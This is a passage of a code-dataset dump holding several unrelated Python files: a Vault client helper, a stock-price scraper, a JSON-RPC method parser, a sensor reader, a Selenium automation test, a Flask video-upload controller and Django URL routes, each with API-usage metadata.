return meta\n\n\ndef operational_token(vault_client, operation, opt):\n \"\"\"Return a properly annotated token for our use.\"\"\"\n display_name = vault_client.lookup_token()['data']['display_name']\n args = {\n 'lease': opt.lease,\n 'display_name': display_name,\n 'meta': token_meta(operation, opt)\n }\n try:\n token = vault_client.create_token(**args)\n except (hvac.exceptions.InvalidRequest,\n hvac.exceptions.Forbidden) as vault_exception:\n if vault_exception.errors[0] == 'permission denied':\n error_output(\"Permission denied creating operational token\", opt)\n else:\n raise\n\n log(\"Using lease of %s\" % opt.lease, opt)\n return token['auth']['client_token']\n\n\ndef client(operation, opt):\n \"\"\"Return a vault client\"\"\"\n if 'VAULT_ADDR' not in os.environ:\n raise aomi.exceptions.AomiError('VAULT_ADDR must be defined')\n\n vault_host = os.environ['VAULT_ADDR']\n\n ssl_verify = True\n if 'VAULT_SKIP_VERIFY' in os.environ:\n if os.environ['VAULT_SKIP_VERIFY'] == '1':\n log('Skipping SSL Validation!', opt)\n ssl_verify = False\n\n log(\"Connecting to %s\" % vault_host, opt)\n vault_client = hvac.Client(vault_host, verify=ssl_verify)\n vault_client.token = initial_token(vault_client, opt)\n if not vault_client.is_authenticated():\n raise aomi.exceptions.AomiCredentials('initial token')\n\n if opt.reuse_token:\n log(\"Not creating operational token\", opt)\n else:\n vault_client.token = operational_token(vault_client, operation, opt)\n if not vault_client.is_authenticated():\n raise aomi.exceptions.AomiCredentials('operational token')\n\n return vault_client\n\n\ndef get_secretfile(opt):\n \"\"\"Renders, YAMLs, and returns the Secretfile construct\"\"\"\n secretfile_path = abspath(opt.secretfile)\n obj = merge_dicts(load_var_files(opt),\n cli_hash(opt.extra_vars))\n return yaml.safe_load(render(secretfile_path, obj))\n\n\ndef app_id_name(app_obj):\n \"\"\"Determines the proper app id name\"\"\"\n name = None\n if 'name' in app_obj:\n name = app_obj['name']\n else:\n name = os.path.splitext(os.path.basename(app_obj['app_file']))[0]\n\n return name\n", "sub_path": "aomi/vault.py", "file_name": "vault.py", "file_ext": "py", "file_size_in_byte": 5856, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.packages.urllib3.disable_warnings", "line_number": 17, "usage_type": "call"}, {"api_name": "requests.packages.urllib3.exceptions.InsecureRequestWarning", "line_number": 17, "usage_type": "argument"}, {"api_name": "requests.packages", "line_number": 17, "usage_type": "attribute"}, {"api_name": "aomi.helpers.exceptions.AomiCredentials", "line_number": 26, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions", "line_number": 26, "usage_type": "attribute"}, {"api_name": "aomi.helpers", "line_number": 26, "usage_type": "name"}, {"api_name": "aomi.helpers.exceptions.AomiCredentials", "line_number": 35, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions", "line_number": 35, "usage_type": "attribute"}, {"api_name": "aomi.helpers", "line_number": 35, "usage_type": "name"}, {"api_name": "aomi.util.appid_file", "line_number": 41, "usage_type": "call"}, {"api_name": "aomi.util.token_file", "line_number": 42, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "aomi.helpers.log", "line_number": 44, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 51, "usage_type": "attribute"}, {"api_name": "aomi.helpers.log", "line_number": 52, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 59, "usage_type": "attribute"}, {"api_name": "aomi.helpers.log", "line_number": 60, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 63, "usage_type": "call"}, {"api_name": "aomi.helpers.log", "line_number": 68, "usage_type": "call"}, {"api_name": "aomi.helpers.log", "line_number": 71, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions.AomiCredentials", "line_number": 74, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions", "line_number": 74, "usage_type": "attribute"}, {"api_name": "aomi.helpers", "line_number": 74, "usage_type": "name"}, {"api_name": "socket.gethostname", "line_number": 82, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 85, "usage_type": "attribute"}, {"api_name": "aomi.helpers.log", "line_number": 96, "usage_type": "call"}, {"api_name": "hvac.exceptions", "line_number": 111, "usage_type": "attribute"}, {"api_name": "hvac.exceptions", "line_number": 112, "usage_type": "attribute"}, {"api_name": "aomi.error.output", "line_number": 114, "usage_type": "call"}, {"api_name": "aomi.helpers.log", "line_number": 118, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 124, "usage_type": "attribute"}, {"api_name": "aomi.helpers.exceptions.AomiError", "line_number": 125, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions", "line_number": 125, "usage_type": "attribute"}, {"api_name": "aomi.helpers", "line_number": 125, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 131, "usage_type": "attribute"}, {"api_name": "aomi.helpers.log", "line_number": 132, "usage_type": "call"}, {"api_name": "aomi.helpers.log", "line_number": 135, "usage_type": "call"}, {"api_name": "hvac.Client", "line_number": 136, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions.AomiCredentials", "line_number": 139, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions", "line_number": 139, "usage_type": "attribute"}, {"api_name": "aomi.helpers", "line_number": 139, "usage_type": "name"}, {"api_name": "aomi.helpers.log", "line_number": 142, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions.AomiCredentials", "line_number": 146, "usage_type": "call"}, {"api_name": "aomi.helpers.exceptions", "line_number": 146, "usage_type": "attribute"}, {"api_name": "aomi.helpers", "line_number": 146, "usage_type": "name"}, {"api_name": "aomi.helpers.abspath", "line_number": 153, "usage_type": "call"}, {"api_name": "aomi.helpers.merge_dicts", "line_number": 154, "usage_type": "call"}, {"api_name": "aomi.template.load_var_files", "line_number": 154, "usage_type": "call"}, {"api_name": "aomi.helpers.cli_hash", "line_number": 155, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 156, "usage_type": "call"}, {"api_name": "aomi.template.render", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 165, "usage_type": "call"}]} +{"seq_id": "275513667", "text": "import re, time, openpyxl\r\nfrom datetime import datetime as dt\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n\r\nworkbook = openpyxl.load_workbook('NSE.xlsx')\r\nquotes_sheet = workbook.get_sheet_by_name('QUOTES')\r\nquotes = []\r\ndateRegEx = re.compile(r'\\d{2}-\\d{2}-\\d{4}')\r\n\r\nfor row_num in range(2, quotes_sheet.max_row+1):\r\n stock = quotes_sheet.cell(row=row_num, column=1).value\r\n if stock:\r\n stock = str(stock).strip()\r\n if (stock != '') and (len(stock) < 6):\r\n start_date = str(quotes_sheet.cell(row=row_num, column=2).value)\r\n match = dateRegEx.search(start_date)\r\n if not match:\r\n print(\"Start date is incorrect for '\" + stock +\r\n \"'. Please provide the correct date in the format of DD-MM-YYYY.\")\r\n else:\r\n end_date = str(quotes_sheet.cell(row=row_num, column=3).value)\r\n match = dateRegEx.search(end_date)\r\n if not match:\r\n print(\"End date is incorrect for '\" + stock +\r\n \"'. Please provide the correct date in the format of DD-MM-YYYY.\")\r\n else:\r\n try:\r\n start_dt = dt(int(start_date[6:]), int(start_date[3:5]), int(start_date[:2]))\r\n end_dt = dt(int(end_date[6:]), int(end_date[3:5]), int(end_date[:2]))\r\n if start_dt <= end_dt <= dt.now():\r\n quotes.append((stock, start_date, end_date))\r\n else:\r\n print(\"For '\" + stock + \"', the start date cannot be greater than end date and also the end \"\r\n \"date cannot be greater than today's date.\")\r\n except:\r\n print(\"The date seems to be incorrect.\")\r\n\r\nprint('~'*100)\r\nif quotes:\r\n print(\"The script will execute for the following stock tickers.\")\r\n print(quotes)\r\nelse:\r\n print(\"Cannot execute the script. Need proper data to search for...\")\r\nprint('~'*100)\r\n\r\nbrowser = webdriver.Chrome()\r\nbrowser.get(\"https://www.nseindia.com/products/content/equities/equities/eq_security.htm\")\r\nfor quote in quotes:\r\n browser.find_element_by_id('symbol').clear()\r\n browser.find_element_by_id('symbol').send_keys(quote[0])\r\n browser.find_element_by_id('rdDateToDate').click()\r\n browser.find_element_by_id('fromDate').clear()\r\n browser.find_element_by_id('fromDate').send_keys(quote[1])\r\n browser.find_element_by_id('toDate').clear()\r\n browser.find_element_by_id('toDate').send_keys(quote[2])\r\n browser.find_element_by_id('get').click()\r\n try:\r\n WebDriverWait(browser, 30).until(EC.element_to_be_clickable((By.CSS_SELECTOR,\r\n \"span[class='download-data-link']\")))\r\n num_of_rows = len(browser.find_elements_by_xpath(\".//*[@id='historicalData']/table/tbody/tr\")) - 1\r\n num_of_columns = len(browser.find_elements_by_xpath(\".//*[@id='historicalData']/table/tbody/tr[1]/th\"))\r\n print(num_of_columns, num_of_rows)\r\n time.sleep(5)\r\n try:\r\n workbook.get_sheet_by_name(quote[0])\r\n except KeyError:\r\n workbook.create_sheet(quote[0])\r\n print(\"Created a new sheet for \" + quote[0])\r\n active_sheet = workbook.get_sheet_by_name(quote[0])\r\n last_row = active_sheet.max_row + 1\r\n active_sheet.cell(row=last_row, column=1).value = \"For date range: \" + quote[1] + \" ~ \" + quote[2]\r\n if last_row < 3:\r\n for h in range(num_of_columns):\r\n h += 1\r\n data = browser.find_element_by_xpath(\".//*[@id='historicalData']/table/tbody/tr[1]/th[%d]\" % (h)).text\r\n active_sheet.cell(row=1, column=h).value = data\r\n for c in range(num_of_columns):\r\n c += 1\r\n r = 1\r\n new_row = last_row\r\n for k in range(num_of_rows):\r\n r += 1\r\n data = browser.find_element_by_xpath(\r\n \".//*[@id='historicalData']/table/tbody/tr[%d]/td[%d]\" % (r, c)).text\r\n new_row += 1\r\n active_sheet.cell(row=new_row, column=c).value = data\r\n workbook.save('NSE.xlsx')\r\n except:\r\n print(\"Browser is taking too much time to load the table for \" + quote[0] + '.')\r\n workbook.save('NSE.xlsx')\r\nprint(\"All done.\")\r\n", "sub_path": "NSE Security-wise Price Volume Archives/nse.py", "file_name": "nse.py", "file_ext": "py", "file_size_in_byte": 4675, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "openpyxl.load_workbook", "line_number": 9, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 34, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 50, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 50, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 62, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 62, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 62, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 62, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 62, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "625663510", "text": "# -*- coding: utf-8 -*-\nimport functools\nimport re\nimport reprlib\nfrom collections import namedtuple\n\nimport structlog\n\nfrom .errors import InvalidNamespaceAPIError\nfrom .errors import InvalidNamespaceError\n\nlogger = structlog.get_logger(__name__)\n\nJRPC_METHOD_PATTERN = r'(^(?P[^\\.]+_api)\\.(?P[^\\.]+)$)|^(?P^[^\\.]+)$|^(?P[^\\.]+){1}\\.(?:(?P[^\\.]+)\\.){0,1}(?P[^\\.]+){1}$'\nJRPC_METHOD_REGEX = re.compile(JRPC_METHOD_PATTERN)\n\n\nSTEEMD_NUMERIC_API_MAPPING = ('database_api', 'login_api')\n\n\nclass URN(namedtuple('URN', 'namespace api method params')):\n __cached_str = None\n\n @classmethod\n def from_request(cls, single_jsonrpc_request: dict):\n parsed = URN._parse_jrpc(single_jsonrpc_request)\n if isinstance(parsed['params'], dict):\n parsed['params'] = dict(sorted(parsed['params'].items()))\n\n return URN(namespace=parsed['namespace'],\n api=parsed['api'],\n method=parsed['method'],\n params=parsed['params'])\n\n # pylint: disable=no-member\n\n @staticmethod\n @functools.lru_cache(8192)\n def _parse_jrpc_method(jrpc_method: str) -> dict:\n return JRPC_METHOD_REGEX.match(jrpc_method).groupdict(default=False)\n\n # pylint: disable=too-many-branches\n @staticmethod\n def _parse_jrpc(single_jsonrpc_request: dict):\n try:\n method = single_jsonrpc_request['method']\n params = single_jsonrpc_request.get('params', False)\n\n matched = URN._parse_jrpc_method(method)\n\n if matched.get('appbase_api'):\n return {\n 'namespace': 'appbase',\n 'api': matched['appbase_api'],\n 'method': matched['appbase_method'],\n 'params': params\n }\n if matched.get('namespace'):\n if matched['namespace'] == 'jsonrpc':\n return {\n 'namespace': 'appbase',\n 'api': 'jsonrpc',\n 'method': matched['method'],\n 'params': params\n }\n return {\n 'namespace': matched['namespace'],\n 'api': matched.get('api'),\n 'method': matched['method'],\n 'params': params\n }\n if matched['bare_method']:\n method = matched['bare_method']\n\n if method != 'call':\n return {\n 'namespace': 'steemd',\n 'api': 'database_api',\n 'method': method,\n 'params': params\n }\n\n if len(params) != 3:\n namespace = 'appbase'\n api, method = params\n _params = False\n else:\n api, method, _params = params\n if api == 'condenser_api' or isinstance(_params, dict) or api == 'jsonrpc':\n namespace = 'appbase'\n else:\n namespace = 'steemd'\n if isinstance(api, int):\n try:\n api = STEEMD_NUMERIC_API_MAPPING[api]\n except IndexError:\n raise InvalidNamespaceAPIError(namespace='steemd',\n api=api)\n\n return {\n 'namespace': namespace,\n 'api': api,\n 'method': method,\n 'params': _params\n }\n else:\n logger.error('failed to parse request method', extra={'matched': matched,\n 'params': params})\n raise InvalidNamespaceError(namespace=single_jsonrpc_request['method'])\n except InvalidNamespaceAPIError as e:\n raise e\n except InvalidNamespaceError as e:\n raise e\n except Exception as e:\n raise InvalidNamespaceError(namespace=single_jsonrpc_request['method'])\n # pylint: enable=too-many-branches\n\n def __repr__(self):\n return f'URN(namespace={self.namespace}, api={self.api}, method={self.method}, params={reprlib.repr(self.params)})'\n\n def __str__(self):\n if self.__cached_str:\n return self.__cached_str\n params = self.params\n if self.params is not False:\n params = f'params={self.params}'.replace(' ', '')\n\n api = self.api\n if api is not False:\n api = str(self.api)\n self.__cached_str = '.'.join(\n p for p in (\n self.namespace,\n api,\n self.method,\n params) if p is not False)\n return self.__cached_str\n\n def __hash__(self):\n return hash(str(self))\n\n def __eq__(self, urn):\n return hash(urn) == hash(self)\n", "sub_path": "jussi/urn.py", "file_name": "urn.py", "file_ext": "py", "file_size_in_byte": 5072, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "structlog.get_logger", "line_number": 12, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 21, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 38, "usage_type": "call"}, {"api_name": "errors.InvalidNamespaceAPIError", "line_number": 97, "usage_type": "call"}, {"api_name": "errors.InvalidNamespaceError", "line_number": 109, "usage_type": "call"}, {"api_name": "errors.InvalidNamespaceAPIError", "line_number": 110, "usage_type": "name"}, {"api_name": "errors.InvalidNamespaceError", "line_number": 112, "usage_type": "name"}, {"api_name": "errors.InvalidNamespaceError", "line_number": 115, "usage_type": "call"}, {"api_name": "reprlib.repr", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "92157192", "text": "import time\nimport spidev\nimport struct\nimport random\nfrom collections import deque\nimport math\nimport hashlib\n\nfrom .struct_package import columns\n\n\ndef get_test_data():\n return [random.randint(0, 3000) for i in range(len(columns))]\n\n\ndef hash_for(data_pack):\n hashId = hashlib.sha256()\n\n hashId.update(data_pack)\n\n return hashId.digest()\n\n\nclass MimState:\n def __init__(self, size_lifo=100, time_update=1000):\n self.spi = spidev.SpiDev()\n self.spi.open(0, 1)\n self.spi.max_speed_hz = 600000\n\n self.status = 'test'\n\n self.last_time = 0\n self.size_lifo = size_lifo\n self.time_update = time_update\n self.state_dict = None\n\n self.lifo_dict = dict([(key, deque([0 for i in range(self.size_lifo)])) for key in columns])\n\n def get_package(self):\n while True:\n\n one_byte = self.spi.readbytes(1)[0]\n if one_byte != 0:\n byte_pack = self.spi.readbytes(72)\n hash_out = bytes(self.spi.readbytes(32))\n\n byte_pack = bytes(byte_pack)\n pack = struct.unpack('f' * 18, byte_pack)\n\n if hash_out == hash_for(byte_pack):\n d = dict([(k, v) for k, v in zip(columns, pack[1:])])\n return d\n\n def update_state(self):\n try:\n self.state_dict = self.get_package()\n except (KeyError, IndexError, StopIteration) as e:\n self.state_dict = dict()\n\n for key in columns:\n self.lifo_dict[key].popleft()\n self.lifo_dict[key].append(\n float(self.state_dict.get(key, 0.1))\n )\n\n def get_value(self, key):\n \"\"\"\n Получить временные значения по ключу\n :param key:\n :return:\n \"\"\"\n return list(self.lifo_dict[key])\n\n def update_status(self, status):\n \"\"\"\n Функция обновит статус ходьбы в БД\n \"\"\"\n self.status = status\n", "sub_path": "dash/src/pyboard.py", "file_name": "pyboard.py", "file_ext": "py", "file_size_in_byte": 2027, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "random.randint", "line_number": 13, "usage_type": "call"}, {"api_name": "struct_package.columns", "line_number": 13, "usage_type": "argument"}, {"api_name": "hashlib.sha256", "line_number": 17, "usage_type": "call"}, {"api_name": "spidev.SpiDev", "line_number": 26, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 37, "usage_type": "call"}, {"api_name": "struct_package.columns", "line_number": 37, "usage_type": "name"}, {"api_name": "struct.unpack", "line_number": 48, "usage_type": "call"}, {"api_name": "struct_package.columns", "line_number": 51, "usage_type": "argument"}, {"api_name": "struct_package.columns", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "417877587", "text": "from selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom ruautogui import keyboard as kb \nfrom ruautogui import mouse as ms \nimport sys, random, time\n\nchrome_options = ChromeOptions()\nchrome_options.add_experimental_option('useAutomationExtension', False)\nchrome_options.add_experimental_option('excludeSwitches', ['enable-automation'])\ndriver = Chrome(options=chrome_options)\n\ndriver.get('https://github.com')\nkb.press('f11') # Полноэкранный режим браузера\ntry:\n input_field = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, \"//input[contains(@class, 'form-control')]\"))\n )\nexcept Exception as exc:\n print('Невозможно найти поле ввода...')\n driver.quit()\n sys.exit()\n\n# input_field - объект Selenium, в данном случае web элемент, представляющий\n# собой поле ввода для поиска на github.com\ninput_field = driver.find_element_by_xpath(\"//input[contains(@class, 'form-control')]\")\n\nms.grab() # имитируем хватание мыши рукой.\ntime.sleep(1)\n\n# field_location - это кортеж из координат web элемента в окне браузера.\n# Координаты представляют собой верхнюю левую точку элемента.\nfield_location = (input_field.location['x'], input_field.location['y'])\n# field_size - это кортеж из длины и высоты элемента в окне браузера.\nfield_size = (input_field.size['width'], input_field.size['height'])\n\n# target_loc используется как кортеж случайных координат внутри web элемента.\ntarget_loc = (\n field_location[0] + random.randint(field_size[0] // 4, field_size[0] // 2),\n field_location[1] + random.randint(field_size[1] // 4, field_size[1] // 2)\n)\n\nms.move(end_pos=target_loc, order=4) # Перемещение курсора мыши в зону поля ввода.\ntime.sleep(1)\nms.click() # Клик левой кнопкой мыши по полю ввода.\ntime.sleep(1)\nkb.type('ruautogui', mode='standard', typo=True) # Ввод с клавиатуры текста 'ruautogui'\ntime.sleep(1)\nkb.press('enter') # Нажатие кнопки enter на клавиатуре.\ntime.sleep(5)\ndriver.quit()", "sub_path": "tests/test_selenium.py", "file_name": "test_selenium.py", "file_ext": "py", "file_size_in_byte": 2607, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 13, "usage_type": "call"}, {"api_name": "ruautogui.keyboard.press", "line_number": 16, "usage_type": "call"}, {"api_name": "ruautogui.keyboard", "line_number": 16, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 18, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 19, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 19, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 19, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 19, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 24, "usage_type": "call"}, {"api_name": "ruautogui.mouse.grab", "line_number": 30, "usage_type": "call"}, {"api_name": "ruautogui.mouse", "line_number": 30, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 41, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 42, "usage_type": "call"}, {"api_name": "ruautogui.mouse.move", "line_number": 45, "usage_type": "call"}, {"api_name": "ruautogui.mouse", "line_number": 45, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}, {"api_name": "ruautogui.mouse.click", "line_number": 47, "usage_type": "call"}, {"api_name": "ruautogui.mouse", "line_number": 47, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "ruautogui.keyboard.type", "line_number": 49, "usage_type": "call"}, {"api_name": "ruautogui.keyboard", "line_number": 49, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 50, "usage_type": "call"}, {"api_name": "ruautogui.keyboard.press", "line_number": 51, "usage_type": "call"}, {"api_name": "ruautogui.keyboard", "line_number": 51, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "549202388", "text": "import os, requests, time, boto3\nfrom requests.auth import HTTPBasicAuth\nfrom flask import Blueprint, request, render_template, flash\nfrom werkzeug.utils import secure_filename\nfrom app import app\nfrom app.main.forms import UploadForm\n\nmain = Blueprint('main', __name__, url_prefix='')\n\n\n@main.route('/', methods=['GET', 'POST'])\ndef upload():\n form = UploadForm(request.form)\n\n if request.method == 'POST' and 'video' in request.files:\n f = request.files['video']\n filename = secure_filename(f.filename)\n f.save(os.path.join(\n app.root_path, 'static/videos', filename\n ))\n\n flash(\"Video file uploaded - \" + filename, 'success')\n\n title = form.title.data\n desc = form.description.data\n url = app.root_path + '/static/videos/' + filename\n\n token = auth()\n\n flash('Authenticated', 'success')\n\n headers = {'Authorization': 'Bearer ' + token}\n\n r = requests.post('https://cms.api.brightcove.com/v1/accounts/' + app.config['VC_ACCOUNT'] + '/videos',\n json={\"name\": title, \"long_description\": desc, \"state\": \"INACTIVE\"}, headers=headers)\n json = r.json()\n\n if r.status_code > 399:\n flash('Error: ' + json['message'], 'danger')\n return render_template('main/upload.html', form=form)\n else:\n vid = json['id']\n flash('Video ' + vid + ' - record created', 'success')\n\n r = requests.get('https://ingest.api.brightcove.com/v1/accounts/' + app.config['VC_ACCOUNT'] + '/videos/' + vid + '/upload-urls/' + title, headers=headers)\n json = r.json()\n\n s3 = boto3.resource('s3',\n aws_access_key_id=json['access_key_id'],\n aws_secret_access_key=json['secret_access_key'],\n aws_session_token=json['session_token'])\n\n s3.Object(json['bucket'], json['object_key']).upload_file(url)\n\n r = requests.post('https://ingest.api.brightcove.com/v1/accounts/' + app.config['VC_ACCOUNT'] + '/videos/' + vid + '/ingest-requests',\n json={\"master\": {\"url\": json['api_request_url']}}, headers=headers)\n json = r.json()\n flash('Ingest job ' + json['id'] + ' started', 'info')\n\n\n return render_template('main/upload.html', form=form)\n\n\ndef auth():\n token_file = os.path.join(app.root_path, 'static/data', 'token.txt')\n\n if os.path.isfile(token_file):\n file = open(token_file, 'r')\n d = file.read()\n token, ttime = d.split(',')\n now = int(time.time())\n ttime = int(ttime)\n if now < (ttime + 300):\n print ('true')\n return token\n else:\n token = login(token_file)\n return token\n else:\n token = login(token_file)\n return token\n\n\ndef login(token_file):\n data = {'grant_type': 'client_credentials'}\n r = requests.post('https://oauth.brightcove.com/v3/access_token', data,\n auth=HTTPBasicAuth(app.config['VC_API_ID'], app.config['VC_API_SECRET']))\n\n json = r.json()\n token = json['access_token']\n file = open(token_file, 'w')\n file.write(token + ',' + str(int(time.time())))\n file.close()\n return token\n", "sub_path": "app/main/controllers.py", "file_name": "controllers.py", "file_ext": "py", "file_size_in_byte": 3310, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Blueprint", "line_number": 8, "usage_type": "call"}, {"api_name": "app.main.forms.UploadForm", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 13, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request.files", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.app.root_path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 22, "usage_type": "call"}, {"api_name": "app.app.root_path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 30, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 34, "usage_type": "call"}, {"api_name": "app.app.config", "line_number": 34, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 43, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 45, "usage_type": "call"}, {"api_name": "app.app.config", "line_number": 45, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 45, "usage_type": "name"}, {"api_name": "boto3.resource", "line_number": 48, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 55, "usage_type": "call"}, {"api_name": "app.app.config", "line_number": 55, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "app.app.root_path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 65, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 71, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 86, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 87, "usage_type": "call"}, {"api_name": "app.app.config", "line_number": 87, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 87, "usage_type": "name"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "625118629", "text": "from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n \n #url(r'^add/$', views.add, name='add'),\n #url(r'^delete/(?P[-\\w])/$',views.delete,name='delete'),#?\n url(r'^taggit/tag/(?P[-\\w]+)/$', views.taggit, name='taggit_by_tag'),\n url(r'^$', views.source_list, name='source_list'),\n url(r'^(?P\\d+)/(?P[-\\w]+)/$', views.source_detail, name='source_detail'),\n\n\n ]\n", "sub_path": "bapalama/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 420, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": 